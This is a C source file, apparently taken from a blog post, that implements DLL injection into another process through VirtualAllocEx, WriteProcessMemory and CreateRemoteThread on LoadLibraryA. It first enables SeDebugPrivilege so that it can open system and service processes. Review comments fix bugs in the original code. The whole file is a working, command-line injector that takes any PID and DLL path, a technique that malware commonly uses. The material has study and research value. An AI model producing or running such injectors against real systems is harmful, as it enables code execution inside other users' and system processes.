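/*
 * CreateRemoteThread DLL injection with SeDebugPrivilege (post published 2022-10-21).
 *
 * Background from the original post (translated; the source text is partly
 * garbled): while reading the "Windows hacker programming" PDF and looking at
 * breaking Session 0 isolation, the author found that the commonly posted
 * "inject a DLL into a system process" code did not work as-is. Testing
 * (apparently on Windows Server 2008 -- the text only says "208") showed that
 * the code was fine and the real cause was a privilege problem: OpenProcess on
 * a system process is refused unless the caller holds SeDebugPrivilege.
 *
 * APIs involved
 *   Remote injection : OpenProcess, VirtualAllocEx, WriteProcessMemory,
 *                      CreateRemoteThread
 *   Privilege enable : OpenProcessToken, LookupPrivilegeValueA,
 *                      AdjustTokenPrivileges
 *
 * NOTE(review): SeDebugPrivilege lets you open most processes with full
 * rights, but it does not bypass protected processes (PPL); OpenProcess with
 * PROCESS_VM_WRITE on those still fails.
 *
 * Reference: https://blog.csdn.net/weixin_41890599/article/details/108771480
 */
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Report a failed API call together with GetLastError().
 * GetLastError() returns a DWORD, so it is printed with %lu rather than %d.
 * Unlike the original macro this does not hide a `return` inside it; the
 * caller decides what to return, so it can also be used inside `bool`
 * functions without returning the integer 1 from them.
 */
#define errorprint(name) \
    printf("%s Error Code:%lu\n", (name), (unsigned long)GetLastError())

/*
 * Enable SeDebugPrivilege in the current process token.
 *
 * Returns true only when the privilege is actually enabled. Two things the
 * original version got wrong that matter in practice:
 *   - AdjustTokenPrivileges returning TRUE does NOT mean the privilege was
 *     granted. If the token does not hold SeDebugPrivilege at all (e.g. the
 *     process is not running elevated) the call still returns TRUE and sets
 *     ERROR_NOT_ALL_ASSIGNED. The original only printed "Sucess" when the
 *     error was ERROR_SUCCESS and silently said nothing otherwise; that case
 *     is now reported as a failure, since it is exactly the "permissions, not
 *     code" problem the post ran into.
 *   - The token handle was never closed, and the `bool` function fell off the
 *     end without returning a value (undefined behaviour).
 */
bool EnbalePrivileges()
{
    HANDLE hToken = NULL;
    LUID luidValue = { 0 };
    TOKEN_PRIVILEGES tp = { 0 };
    bool ok = false;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        errorprint("OpenProcessToken");
        return false;
    }

    /* Resolve the privilege name to the LUID that represents it on this system. */
    if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &luidValue)) {
        errorprint("LookupPrivilegeValueA Privilege:SeDebugPrivilege");
        CloseHandle(hToken);
        return false;
    }

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luidValue;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    /* Enable the privilege; GetLastError() must be read right after the call. */
    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL)) {
        errorprint("Enable Privilege Failure");
    } else if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
        /* The call "succeeded" but the token never held the privilege. */
        printf("Enable Privilege:SeDebugPrivilege not held by this token "
               "(run elevated / as an administrator)\n");
    } else {
        printf("Enable Privilege:SeDebugPrivilege Sucess\n");
        ok = true;
    }

    CloseHandle(hToken);
    return ok;
}

/*
 * Write the DLL path into `target` and start a remote thread at LoadLibraryA
 * with that buffer as its argument.
 *
 * Returns 0 on success, 1 on failure. The thread handle is always closed; the
 * remote buffer is released only once the remote thread has finished reading
 * it (LoadLibraryA reads the path from that buffer).
 *
 * Assumptions that must hold:
 *   - Injector and target have the same bitness. The LoadLibraryA address is
 *     taken from OUR kernel32 and reused in the target, which only works
 *     because kernel32 is mapped at the same base in every process of a given
 *     boot session, and only for the same architecture.
 *   - `dllname` is an ANSI path (LoadLibraryA) that the TARGET process can read.
 */
static int inject_dll(HANDLE target, const char *dllname)
{
    int rc = 1;
    /* The terminating NUL must be written too. The original used strlen()*2,
     * which made WriteProcessMemory read that many bytes from the source
     * string literal -- i.e. past its end. */
    SIZE_T dllnamesize = strlen(dllname) + 1;
    LPVOID vaeAddr = NULL;
    FARPROC loadaddress = NULL;
    HANDLE runthread = NULL;
    DWORD waited = WAIT_FAILED;

    vaeAddr = VirtualAllocEx(target, NULL, dllnamesize, MEM_COMMIT, PAGE_READWRITE);
    if (vaeAddr == NULL) {
        errorprint("VirtualAllocEx");
        goto cleanup;
    }
    printf("VirtualAllocEx Sucess %p\n", vaeAddr);

    if (!WriteProcessMemory(target, vaeAddr, dllname, dllnamesize, NULL)) {
        errorprint("WriteProcessMemory");
        goto cleanup;
    }
    printf("WriteProcessMemory Sucess\n");

    loadaddress = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "LoadLibraryA");
    if (loadaddress == NULL) {
        errorprint("Get Kernel32 Address");
        goto cleanup;
    }
    printf("Get Function LoadlibraryA Function Address:%p\n", (void *)loadaddress);

    runthread = CreateRemoteThread(target, NULL, 0,
                                   (LPTHREAD_START_ROUTINE)loadaddress, vaeAddr, 0, NULL);
    if (runthread == NULL) {
        /* The original printed "CreateRemoteThread Sucess" even on this path. */
        errorprint("CreateRemoteThread");
        goto cleanup;
    }
    printf("CreateRemoteThread Sucess\n");

    /* Give LoadLibraryA a bounded time to finish before touching the buffer;
     * a DllMain that blocks must not hang the injector forever. */
    waited = WaitForSingleObject(runthread, 10000);
    rc = 0;

cleanup:
    if (runthread != NULL) {
        CloseHandle(runthread);
    }
    /* Only free the remote buffer when we know the remote thread is done with
     * it; if the wait timed out, leaking one page is safer than a
     * use-after-free inside the target. */
    if (vaeAddr != NULL && (runthread == NULL || waited == WAIT_OBJECT_0)) {
        VirtualFreeEx(target, vaeAddr, 0, MEM_RELEASE);
    }
    return rc;
}

/*
 * Entry point.
 *
 * Usage: injector [pid] [dll-path]
 * With no arguments the original hard-coded PID (1148) and DLL path are used,
 * so the program behaves as before.
 *
 * Returns 0 when the remote thread was created, 1 on any failure.
 */
int main(int argc, char **argv)
{
    DWORD pid = 1148;
    const char *dllname = "C:\\Users\\JiuShi\\Desktop\\testdll.dll";

    if (argc > 1) {
        char *end = NULL;
        unsigned long v = strtoul(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || v == 0) {
            printf("Invalid pid: %s\n", argv[1]);
            return 1;
        }
        pid = (DWORD)v;
    }
    if (argc > 2) {
        dllname = argv[2];
    }

    /* Without SeDebugPrivilege, OpenProcess on a system/service process fails
     * with ERROR_ACCESS_DENIED -- the problem the post originally hit. */
    if (!EnbalePrivileges()) {
        printf("Continuing without SeDebugPrivilege; "
               "OpenProcess on system processes will likely fail\n");
    }

    /* Least privilege: request only the rights the injection needs instead of
     * PROCESS_ALL_ACCESS. */
    const DWORD access = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                         PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
    HANDLE pidmodule = OpenProcess(access, FALSE, pid);
    if (pidmodule == NULL) {
        errorprint("OpenProcess");
        return 1;
    }
    /* HANDLE is a pointer; the original printed it with %x, which truncates
     * on 64-bit builds. */
    printf("OpenProcess HANDLE %p\n", (void *)pidmodule);

    int rc = inject_dll(pidmodule, dllname);
    CloseHandle(pidmodule);

    system("pause");
    return rc;
}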